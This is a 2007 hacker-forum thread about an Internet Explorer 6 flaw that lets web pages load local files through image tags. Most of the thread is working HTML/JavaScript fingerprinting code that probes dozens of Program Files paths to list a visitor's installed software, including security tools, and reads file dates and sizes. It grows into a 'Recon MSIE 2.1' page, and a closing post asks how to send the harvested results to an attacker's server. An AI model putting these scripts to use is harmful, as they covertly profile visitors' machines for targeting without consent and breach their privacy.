Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Who's got it? Who's giving it away? How to protect your privacy and steal it from other people. For intellectual privacy, personal privacy, and blackhats alike... 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
IE img file access ?
Posted by: Ivan
Date: May 03, 2007 03:09PM

Hello there,

I don`t know if this known to You, if answers "Yes" please remove topic. Thx

I found that IE 6 don`t block access to local files throught <img src=""> tag. That means that we can load images from local machine into our site. At first sight that is not a big deal because we can "call" only images, but that can be usefull in some situations:

1. We can make some screenshoots on target machine and view them later. This can be usefull when we don`t have a way to copy files or when we have a little time for "action". It`s require a litle social engenering but ...

2. We can trace users, with bruteforcing IE cash for some img that is unique for particular site.

3. We can enumerating installed programs on target machine, loading specific image from installed program files.

4. Ideas ... ?

Example: <img src="file://C:/WINDOWS/Blue Lace 16.bmp">

This is tested on Win XP SP 2, IE 6 (works with "HIGH" security zone, too).

Ivan

http://www.security-net.biz/

Options: ReplyQuote
Re: IE img file access ?
Posted by: Anonymous User
Date: May 03, 2007 03:51PM

Yeah it is known, I also thought it was pretty new some months ago. But it exist for a long time. Can't blame no one though, it's impossible to know everything.

You could use it for foot/fingerprinting users/software like: http://www.0x000000.com/?i=229&bin=11100101

etc.

Options: ReplyQuote
Re: IE img file access ?
Posted by: rsnake
Date: May 08, 2007 07:39PM

Ivan, yes, that's known, but I don't think there is a good catalog of them anywhere. It might be nice to start documenting them. I'll be talking more about this at the end of the week.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: IE img file access ?
Posted by: Anonymous User
Date: May 09, 2007 11:07AM

indeed, it ook me over 1 hour to install all these apps and test them. So if anyone want to post his findings it would be awesome to build a huge list.

Options: ReplyQuote
Re: IE img file access ?
Posted by: trev
Date: May 10, 2007 07:06PM

Just for info: bug 269125 for Mozilla/Firefox was about a similar issue.

Options: ReplyQuote
Re: IE img file access ?
Posted by: rsnake
Date: May 11, 2007 11:03AM

Btw, just confirmed that this does not appear to affect IE7.0, at least not in this way from what I can tell.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: IE img file access ?
Posted by: Ivan
Date: July 17, 2007 06:57PM

I create small update of @Ronald`s script. It has now 50 programs paths ... IE img file access, fingerprint

/*
Script from @Ronald (http://www.0x000000.com/?i=229&bin=11100101)
Updated by Ivan Markovic (http://www.security-net.biz/)
*/

<script>

function LogApps(vir) {
try {
document.getElementById("res").innerHTML += '<br />' + vir;
} catch(e) { }
}

</script>

<img src="file:///C:/Program Files/DAEMON Tools/icons/tray1.ico" onLoad="LogApps('Daemon Tools');">
<img src="file:///C:/Program Files/Messenger/logowin.gif" onLoad="LogApps('MSN Messenger');">
<img src="file:///C:/Program Files/Metasploit/Framework3/cygwin.ico" onLoad="LogApps('Metasploit');">
<img src="file:///C:/Program Files/Steganos Internet Anonym 2006/sia2006.product.ico" onLoad="LogApps('Steganos');">
<img src="file:///C:/wamp/wampserver.ico" onLoad="LogApps('WAMP Server');">
<img src="file:///C:/Program Files/Winamp/asm.ico" onLoad="LogApps('Winamp');">
<img src="file:///C:/Program Files/VMware/VMware Player/ico/config.ico" onLoad="LogApps('VMware');">
<img src="file:///C:/Program Files/VideoLAN/VLC/http/favicon.ico" onLoad="LogApps('VLC media Player');">
<img src="file:///C:/Program Files/Softwin/BitDefender10/Skin/Default/help.ico" onLoad="LogApps('Bitdefender');">
<img src="file:///C:/Program Files/OpenVPN/openvpn.ico" onLoad="LogApps('OpenVPN');">
<img src="file:///C:/Program Files/SpeedBit Video Accelerator/tray_icon.ico" onLoad="LogApps('Speedbit');">
<img src="file:///C:/Program Files/BitTorrent/images/bittorrent.ico" onLoad="LogApps('Bittorrent');">
<img src="file:///C:/Program Files/Google/Google Earth/earth.ico" onLoad="LogApps('Google Earth');">
<img src="file:///C:/Program Files/Magentic/bin/magentic1.ico" onLoad="LogApps('Magentic');">
<img src="file:///C:/Program Files/Yahoo!/Messenger/generic_messenger.ico" onLoad="LogApps('Yahoo! Messenger');">
<img src="file:///C:/Program Files/AIM6/services/imApp/aim_en-US.ico" onLoad="LogApps('AIM6');">
<img src="file:///C:/Program Files/ICQLite/Plugins/App/tools.ico" onLoad="LogApps('ICQ');">
<img src="file:///C:/Program Files/Trillian/stixe/icons/Default/Trilly.ico" onLoad="LogApps('Trillian');">
<img src="file:///C:/Program Files/Zone labs/ZoneAlarm/images/spacer.gif" onLoad="LogApps('Zone Alarm');">
<img src="file:///C:/Program Files/Microsoft Baseline Security Analyzer 2/graphics/x_red.gif" onLoad="LogApps('MS baseline');">
<img src="file:///C:/Program Files/Acunetix/Web Vulnerability Scanner 4/acufile.ico" onLoad="LogApps('Acunetix 4');">
<img src="file:///C:/Program Files/Adobe/Acrobat 7.0/Acrobat/AC3D_App.ico" onLoad="LogApps('Acrobat 7');">
<img src="file:///C:/Program Files/Adobe/Adobe Help Viewer/1.0/help.jpg" onLoad="LogApps('Adobe Help Viewer 1.0');">
<img src="file:///C:/Program Files/Adobe/Photoshop CS/Samples/Ranch House.jpg" onLoad="LogApps('Photoshop CS');">
<img src="file:///C:/Program Files/Adobe/Reader 8.0/Reader/Tracker/add_reviewer.gif" onLoad="LogApps('Adobe Reader 8');">
<img src="file:///C:/Program Files/Analog Devices/SoundMAX/SMax3CP.ico" onLoad="LogApps('SoundMAX');">
<img src="file:///C:/Program Files/Aptana/Aptana IDE Beta/jre/lib/images/cursors/win32_CopyDrop32x32.gif" onLoad="LogApps('Aptana');">
<img src="file:///C:/Program Files/ASUS/WLAN Card Utilities/Wireless.bmp" onLoad="LogApps('ASUS WLAN');">
<img src="file:///C:/Program Files/ATI Technologies/ATI Control Panel/ati_cube.ico" onLoad="LogApps('ATI CP');">
<img src="file:///C:/Program Files/BearPaw 1200CU Plus/Driver/ABOUT.BMP" onLoad="LogApps('BearPaw scanner');">
<img src="file:///C:/Program Files/Corel/Graphics9/newdaisy.gif" onLoad="LogApps('Corel 9');">
<img src="file:///C:/Program Files/Flare/logo.gif" onLoad="LogApps('Flare');">
<img src="file:///C:/Program Files/FlashGet/default1.GIF" onLoad="LogApps('FlashGet');">
<img src="file:///C:/Program Files/HTML Help Workshop/App/hhw.gif" onLoad="LogApps('HTML Help Workshop');">
<img src="file:///C:/Program Files/IDA Freeware 4.3/freeida.bmp" onLoad="LogApps('IDA Freeware 4.3');">
<img src="file:///C:/Program Files/Macromedia/Dreamweaver 8/JVM/lib/images/cursors/win32_CopyDrop32x32.gif" onLoad="LogApps('Dreamweaver 8');">
<img src="file:///C:/Program Files/Macromedia/Flash 8/en/Configuration/Icons/icon_0.png" onLoad="LogApps('Flash 8');">
<img src="file:///C:/Program Files/Microsoft Office/OFFICE11/BITMAPS/DBWIZ/ASSETS.GIF" onLoad="LogApps('MS Office 11');">
<img src="file:///C:/Program Files/Mozilla Firefox/res/loading-image.gif" onLoad="LogApps('Mozilla FF');">
<img src="file:///C:/Program Files/Mv2Player/tray.ico" onLoad="LogApps('Mv2Player');">
<img src="file:///C:/Program Files/Opera/styles/images/opera.png" onLoad="LogApps('Opera');">
<img src="file:///C:/Program Files/Rapid CSS 2005/image.gif" onLoad="LogApps('Rapid CSS 2005');">
<img src="file:///C:/Program Files/StrongDC++/EmoPacks/Emoticons/1.bmp" onLoad="LogApps('StrongDC++');">
<img src="file:///C:/Program Files/Swift/SwiftLogo.JPG" onLoad="LogApps('Swift');">
<img src="file:///C:/Program Files/Native Instruments/Traktor DJ Studio 2/Readme_Files/logo.gif" onLoad="LogApps('Traktor DJ Studio 2');">
<img src="file:///C:/Program Files/Syhunt/Sandcat Suite/Himgs/logo.bmp" onLoad="LogApps('Sandcat Suite');">
<img src="file:///C:/Program Files/Symantec/Symantec Web Security/html/english/igeartop.gif" onLoad="LogApps('Symantec Web Security');">
<img src="file:///C:/Program Files/The Regex Coach/doc/lisp_logo.jpg" onLoad="LogApps('Regex Coach');">
<img src="file:///C:/Perl/html/favicon.ico" onLoad="LogApps('Active Perl');">
<img src="file:///C:/Python25/DLLs/py.ico" onLoad="LogApps('Python25');">

<div id="res"></div>

http://www.security-net.biz/

Options: ReplyQuote
Re: IE img file access ?
Posted by: rsnake
Date: July 23, 2007 10:34AM

Alright, but now we should modify it to use res:// so it works in IE7: http://ha.ckers.org/blog/20070721/res-protocol-local-file-enumeration/

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: IE img file access ?
Posted by: Anonymous User
Date: July 23, 2007 10:20PM

Yeah that would be a great idea.

On a side note: it is also possible to determine the file creationdate, modificationdate. Which could be very useful to determine the installed version, or to see if the file has been modified or re-installed. Internet explorer has these nifty Javascript functions:

this.fileUpdatedDate
this.fileModifiedDate
this.fileCreatedDate



function LastId(app,up,mod,build) {
var app,up,mod,build
var pre = '\r\n<b>'+app+'</b><br />\r\n created:'+build+ ' last updated:'+up+' last modified:'+mod+'<br /><br />\r\n'
try {
document.getElementById("result").innerHTML += pre;
} catch(e) { }
}

</script>
<img src="file:///C:/Program Files/Messenger/lvback.gif" onLoad="LastId('MSN',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">
<img src="file:///C:/Program Files/DAEMON Tools/icons/tray1.ico" onLoad="LastId('DaemonTools',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">
<img src="file:///C:/Program Files/Messenger/logowin.gif" onLoad="LastId('MSNMessenger',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">
<img src="file:///C:/Program Files/Metasploit/Framework3/cygwin.ico" onLoad="LastId('Metasploit',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">
<img src="file:///C:/Program Files/Steganos Internet Anonym 2006/sia2006.product.ico" onLoad="LastId('Steganos',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">
<img src="file:///C:/wamp/wampserver.ico" onLoad="LastId('WAMP Server',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">
<img src="file:///C:/Program Files/Winamp/asm.ico" onLoad="LastId('Winamp',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">
<img src="file:///C:/Program Files/VMware/VMware Player/ico/config.ico" onLoad="LastId('VMware',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">

<img src="file:///C:/Program Files/VideoLAN/VLC/http/favicon.ico" onLoad="LastId('VLC mediaPlayer',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">
<img src="file:///C:/Program Files/Softwin/BitDefender10/Skin/Default/help.ico" onLoad="LastId('Bitdefender',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">
<img src="file:///C:/Program Files/OpenVPN/openvpn.ico" onLoad="LastId('OpenVPN',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">
<img src="file:///C:/Program Files/SpeedBit Video Accelerator/tray_icon.ico" onLoad="LastId('Speedbit',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">
<img src="file:///C:/Program Files/BitTorrent/images/bittorrent.ico" onLoad="LastId('Bittorrent',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">
<img src="file:///C:/Program Files/Google/Google Earth/earth.ico" onLoad="LastId('GoogleEarth',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">
<img src="file:///C:/Program Files/Magentic/bin/magentic1.ico" onLoad="LastId('Magentic',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">
<img src="file:///C:/Program Files/Yahoo!/Messenger/generic_messenger.ico" onLoad="LastId('Yahoo!Messenger',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">
<img src="file:///C:/Program Files/AIM6/services/imApp/aim_en-US.ico" onLoad="LastId('AIM6',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">
<img src="file:///C:/Program Files/ICQLite/Plugins/App/tools.ico" onLoad="LastId('ICQ',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">
<img src="file:///C:/Program Files/Trillian/stixe/icons/Default/Trilly.ico" onLoad="LastId('Trillian',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">
<img src="file:///C:/Program Files/Zone labs/ZoneAlarm/images/spacer.gif" onLoad="LastId('ZoneAlarm',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">
<img src="file:///C:/Program Files/Microsoft Baseline Security Analyzer 2/graphics/x_red.gif" onLoad="LastId('MSbaseline',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">
<img src="file:///C:/WINDOWS/Resources/Themes/Aquatica/Icons/Run.ico" onLoad="LastId('AquaticaTheme',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">
<img src="file:///C:/wamp/phpmyadmin/themes/original/img/error.ico" onLoad="LastId('PHPMyadmin',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">
<img src="file:///C:/Program Files/UseNeXT/pp/gulli.ico"  onLoad="LastId('UseNext',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">
<img src="file:///C:/Program Files/Ipswitch/WS_FTP Professional/FtpPro.ico"  onLoad="LastId('WSFTPPro',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">

<img src="file:///C:/Program Files/foobar2000/icons/wav.ico"  onLoad="LastId('FOOBAR2000',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">
<img src="file:///C:/cygwin/cygwin.ico" onLoad="LastId('CygWIN',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">
<img src="file:///C:/Program Files/Fiddler2/IE_Toolbar.ico" onLoad="LastId('Fiddler!',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">
<img src="file:///C:/Program Files/Adobe/Adobe Bridge CS3/icon/bridge.ico" onLoad="LastId('AdobeBridge',fileUpdatedDate,fileModifiedDate,fileCreatedDate);">

So anyone interesting in making this a better and faster, and complete function? because now all these snippets are scattered around. Would be cool to make a hug list and a proper function.

Options: ReplyQuote
Re: IE img file access ?
Date: July 25, 2007 04:54AM

Brilliant idea, Ronald. I'm still interested in knowing how the "res" protocol can be used to modify an application as mentioned by BK here (http://ha.ckers.org/blog/20070721/res-protocol-local-file-enumeration/#comment-44562).


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: IE img file access ?
Posted by: humble
Date: July 30, 2007 09:20AM

Some more ... I found about 1400 apps that can be detected, but I got bored half-way though the A's... PM if you want the list.

I noticed the that res:// protocol wont load images directly, but it will if the image is in an iframe. Maybe there's a way the outer doc can ask for the dates of images inside its child iframes - I dunno - this is probably a local XSS thing that might have been removed.

The date and time on this baby shows you when you installed Windows - probably handy if there's a way to get this info from JS somehow: C:/Windows/DtcInstall.log Anyone know what other new Xxxxx() things you can make in JavaScript, besides new Image()'s ?




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<style>
* {
font-family:Arial, Helvetica, sans-serif;
font-size:11px;
color:#ffffff;
}
h1 {
font-family:Arial, Helvetica, sans-serif;
font-size:18px;
color:#ffffff;
}
img {
display:none;
}
</style>
<head>
<title>recon</title>
<script>

function imgChk(desc,fn) {
var desc,fn
if(fn.substr(0,1)=="/") {
fn="file:///C:"+ fn;
} else {
fn="file:///C:/Program Files/"+ fn;
}
var pre = '\r\n<img src="'+ fn + '" onLoad="LastId2(' + "'" + desc + "',this)" + '">';

try { document.getElementById("imgs").innerHTML += pre; } catch(e) { }
}

function LastId2(appname,obj) {
var appname,obj,fs,fc,fu,fm
try { fs=obj.fileSize } catch(e) { }
try { fc=obj.fileCreatedDate } catch(e) { }
try { fu=obj.fileUpdatedDate } catch(e) { }
try { fm=obj.fileModifiedDate } catch(e) { }
var pre = '\r\n<b>'+appname+'</b><br />\r\n size:' + fs + ' created:' + fc + ' last updated:' + fu + ' last modified:' + fm + '<br /><br />\r\n'
try {
document.getElementById("result").innerHTML += pre;
} catch(e) { }
}
</script>
</head><body bgcolor="#000000">
<h1>Recon MSIE 2.1&copy;</h1>
<br />
<div id="result"></div>
<div id="imgs"></div>
</div>

<script>
imgChk("MSN","Messenger/lvback.gif")
imgChk("Trillian","Trillian/stixe/icons/Default/Trilly.ico")
imgChk("DaemonTools","DAEMON Tools/icons/tray1.ico")
imgChk("MSNMessenger","Messenger/logowin.gif")
imgChk("Metasploit","Metasploit/Framework3/cygwin.ico")
imgChk("Steganos","Steganos Internet Anonym 2006/sia2006.product.ico")
imgChk("Winamp","Winamp/asm.ico")
imgChk("VMware","VMware/VMware Player/ico/config.ico")
imgChk("VLC mediaPlayer","VideoLAN/VLC/http/favicon.ico")
imgChk("Bitdefender","Softwin/BitDefender10/Skin/Default/help.ico")
imgChk("OpenVPN","OpenVPN/openvpn.ico")
imgChk("Speedbit","SpeedBit Video Accelerator/tray_icon.ico")
imgChk("Bittorrent","BitTorrent/images/bittorrent.ico")
imgChk("GoogleEarth","Google/Google Earth/earth.ico")
imgChk("Magentic","Magentic/bin/magentic1.ico")
imgChk("Yahoo!Messenger","Yahoo!/Messenger/generic_messenger.ico")
imgChk("AIM6","AIM6/services/imApp/aim_en-US.ico")
imgChk("ICQ","ICQLite/Plugins/App/tools.ico")
imgChk("ZoneAlarm","Zone labs/ZoneAlarm/images/spacer.gif")
imgChk("MSbaseline","Microsoft Baseline Security Analyzer 2/graphics/x_red.gif")
imgChk("UseNext","UseNeXT/pp/gulli.ico")
imgChk("WSFTPPro","Ipswitch/WS_FTP Professional/FtpPro.ico")
imgChk("FOOBAR2000","foobar2000/icons/wav.ico")
imgChk("Fiddler!","Fiddler2/IE_Toolbar.ico")
imgChk("AdobeBridge","Adobe/Adobe Bridge CS3/icon/bridge.ico")
imgChk('WAMP Server',"/wamp/wampserver.ico")
imgChk('AquaticaTheme',"/WINDOWS/Resources/Themes/Aquatica/Icons/Run.ico")
imgChk('PHPMyadmin',"/wamp/phpmyadmin/themes/original/img/error.ico")
imgChk('CygWIN',"/cygwin/cygwin.ico")


imgChk('Activeperl', "/Perl/eg/aspSamples/ASbanner.gif")
imgChk('Perl Dev Kit', "/Perl/eg/PerlEx/x.gif")
imgChk('Perl', "/Perl/html/favicon.ico")
imgChk('Activeperl PPM', "/Perl/lib/ActivePerl/PPM/images/accept.png")
imgChk('Activeperl TK lib', "/Perl/lib/Tk/anim.gif")
imgChk('Office (Ultimate on Vista?)',"/ProgramData/Microsoft/OFFICE/DocumentRepository.ico")
imgChk('Vista?', "/ProgramData/Microsoft/User Account Pictures/Default Pictures/usertile10.bmp")
imgChk('Vista User', "/ProgramData/Microsoft/User Account Pictures/guest.bmp")
imgChk('MSScan', "/ProgramData/Microsoft/Windows NT/MSScan/WelcomeScan.jpg")
imgChk('OFFICE', "/Users/All Users/Microsoft/OFFICE/DocumentRepository.ico")
imgChk('Vista User', "/Users/All Users/Microsoft/User Account Pictures/guest.bmp")
imgChk('Windows Mail', "/Users/!/AppData/Local/Microsoft/Windows Mail/Stationery/Bears.jpg")
imgChk('Administrator account', "/Users/Administrator/AppData/Local/Temp/Administrator.bmp")
imgChk('AC3Filter',"Program Files/AC3Filter/pic/email.gif")
imgChk('ActiveState Perl Dev Kit 7.0',"Program Files/ActiveState Perl Dev Kit 7.0/bin/lib/tcl/images/accept.png")
imgChk('Acrobat 6.0',"Program Files/Adobe/Acrobat 6.0/Acrobat/plug_ins/PictureTasks/HowTo/Images/edit.gif")
imgChk('Acrobat 7.0',"Program Files/Adobe/Acrobat 7.0/Reader/plug_ins/PictureTasks/Howto/images/edit.gif")
imgChk('Acrobat 8.0',"Program Files/Adobe/Acrobat 8.0/Acrobat/adobe_epic/eula/background.png")
imgChk('Acrobat 8.0/Designer 8.0',"Program Files/Adobe/Acrobat 8.0/Designer 8.0/Des_splash.png")
imgChk('Acrobat 7.0/Designer 7.0',"Program Files/Adobe/Adobe Acrobat 7.0/Designer 7.0/Des_splash.png")
imgChk('Adobe Bridge',"Program Files/Adobe/Adobe Bridge/Activation/background_bk.bmp")
imgChk('Adobe GoLive CS2',"Program Files/Adobe/Adobe GoLive CS2/Activation/background.bmp")
imgChk('Adobe GoLive CS2/Adobe GoLive SDK 8.0r1',"Program Files/Adobe/Adobe GoLive CS2/Adobe GoLive SDK 8.0r1/Samples/KeyMap/MacKeyMap.gif")
imgChk('Adobe Help Center',"Program Files/Adobe/Adobe Help Center/Required/help/images/BannerTile.gif")
imgChk('Adobe Help Viewer/1.0',"Program Files/Adobe/Adobe Help Viewer/1.0/help.jpg")
imgChk('Adobe Illustrator CS2',"Program Files/Adobe/Adobe Illustrator CS2/Demonstrator/content/files/adobeMan.jpg")
imgChk('Adobe InDesign CS2',"Program Files/Adobe/Adobe InDesign CS2/Activation/background.bmp")
imgChk('Adobe Photoshop CS2',"Program Files/Adobe/Adobe Photoshop CS2/Activation/background.bmp")
imgChk('Adobe Stock Photos',"Program Files/Adobe/Adobe Stock Photos/icons/AdobeStockPhotos.ico")
imgChk('Adobe Version Cue CS2',"Program Files/Adobe/Adobe Version Cue CS2/jre/javaws/JavaCup.ico")
imgChk('Photoshop 7.0',"Program Files/Adobe/Photoshop 7.0/Help/images/3d_cube.gif")
imgChk('Reader 8.0',"Program Files/Adobe/Reader 8.0/Reader/adobe_epic/eula/background.png")
imgChk('Advanced Batch Converter',"Program Files/Advanced Batch Converter/abc.jpg")
imgChk('Advanced GIF Animator',"Program Files/Advanced GIF Animator/Tutorial/add.gif")
imgChk('BIG W Online Digital Photo Shop',"Program Files/AGFAnet/BIG W Online Digital Photo Shop/Settings/customization/default/banners/banner1.jpg")
imgChk('Nero',"Program Files/Ahead/Nero/CDEXTRA.jpg")
imgChk('Nero ShowTime',"Program Files/Ahead/Nero ShowTime/default.bmp")
imgChk('NeroVision',"Program Files/Ahead/NeroVision/Buttons/5pointstar_Button.png")
imgChk('AIM',"Program Files/AIM/aimalert.gif")
imgChk('GIF Construction Set Professional',"Program Files/Alchemy Mindworks/GIF Construction Set Professional/html/CELL0.GIF")
imgChk('SoundMAX',"Program Files/Analog Devices/SoundMAX/SMax3CP.ico")
imgChk('Aspell',"Program Files/Aspell/doc/html/contents.png")
imgChk('ATI.ACE',"Program Files/ATI Technologies/ATI.ACE/branding.ico")
imgChk('AutoGK',"Program Files/AutoGK/help/Pics/addingmovie.jpg")
imgChk('Avanquest update',"Program Files/Avanquest update/LiveUpdate.ico")
imgChk('Avatar Player',"Program Files/Avatar Player/Skate/sk_brdg.bmp")
imgChk('AviSynth 2.5',"Program Files/AviSynth 2.5/Docs/english/pictures/externalfilters/avsmon.jpg")
imgChk('BitTorrent',"Program Files/BitTorrent/images/bittorrent.ico")
imgChk('Bs Recorder GOLD5',"Program Files/B's Recorder GOLD5/BG5PRJ.ico")
imgChk('CDLabel',"Program Files/CDLabel/ref/area0.jpg")
imgChk('comicart',"Program Files/chat/comicart/field.bmp")

//<xiframe src="res://shdoclc.dll/pagerror.gif" onLoad="LastId('Windows RES error',fileUpdatedDate,fileModifiedDate,fileCreatedDate);"></iframe>
//<xiframe src="file:///C:/Windows/DtcInstall.log" onLoad="LastId('Windows install date',fileUpdatedDate,fileModifiedDate,fileCreatedDate);"></iframe>
</script></body></html>

Options: ReplyQuote
Re: IE img file access ?
Posted by: w0ts0n
Date: October 16, 2007 09:54AM

I'm still a n00bie to all this stuff, but it's highly interesting. So let me get this right, you create this html file and it will tell the browser to execute the images on the local machine on page load?..

Cool.

Options: ReplyQuote
Re: IE img file access ?
Posted by: fragge
Date: February 17, 2008 11:49PM

Humble, imo that list should be completely filled out :) I'd do it, but I'm very busy these days :< I just took your code and made it more aesthetically pleasing. How would you go about taking the results outputted by the chkimgs into a header or something for sending to my own server, either as data or as smtp mail? ie: as part of that code. This would be a very powerful reconnaissance tool, although with a full list as you have proposed, it would take a lot of processing time.

Options: ReplyQuote


Sorry, only registered users may post in this forum.